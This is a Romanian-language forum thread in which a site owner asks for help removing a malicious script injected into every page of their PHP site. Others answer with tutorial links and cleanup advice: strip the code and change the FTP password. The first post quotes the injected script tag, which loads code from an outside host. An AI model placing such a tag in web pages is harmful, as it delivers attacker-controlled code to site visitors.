Pagina 1 din 1

vulnerabilitate in paginile unui site

Scris: Joi Mai 28, 2015 7:45 pm
de menace_forevermore
va salut!

De ceva timp am o problema de securitate cu un site creat de mine. Anume in fiecare pagina din el incepand cu index.php mi se insereaza un cond malitios

Cod: SelectaĊ£i tot

<!--3bc84d--><script type="text/javascript" src="http://dealerscollection.com.ar/wp-content/themes/twentythirteen/pxhctwfw.php?id=39527871"></script><!--/3bc84d-->


iar Google ma avertizeaza ca siteul e "potential harmful".

Cred ca este vorba de un atac XSS dar nu prea mai sunt in tema cu programarea web si problemele de securitate, si nu am timp sa ma documentez cum pot remedia, asa ca rog pe cineva care se pricepe sa-mi spuna ce anume trebuie modificat.

Atasez index.php cu tot cu codul injecatat. Multumesc anticipat!

Re: vulnerabilitate in paginile unui site

Scris: Joi Mai 28, 2015 10:21 pm
de Birkoff
iti ia cel mult 1 ora sa te documentezi, poti citi articolele de aici
tutoriale despre securitate
si cel mai bun din toate e tutorialul phpsec.org

si dupa ce te-ai lamurit unde ai lipsuri si probleme, le poti rezolva tu singur.

Re: vulnerabilitate in paginile unui site

Scris: Mie Sep 02, 2015 12:38 pm
de clickymedia
Salut,

Am avut si eu ceva de genu si a fost de la un virus
Eu am cautat in toate paginile site-ului dupa codul inserat in plus si am dat replace cu un spatiu gol
Dupa am schimbat parola la ftp si gata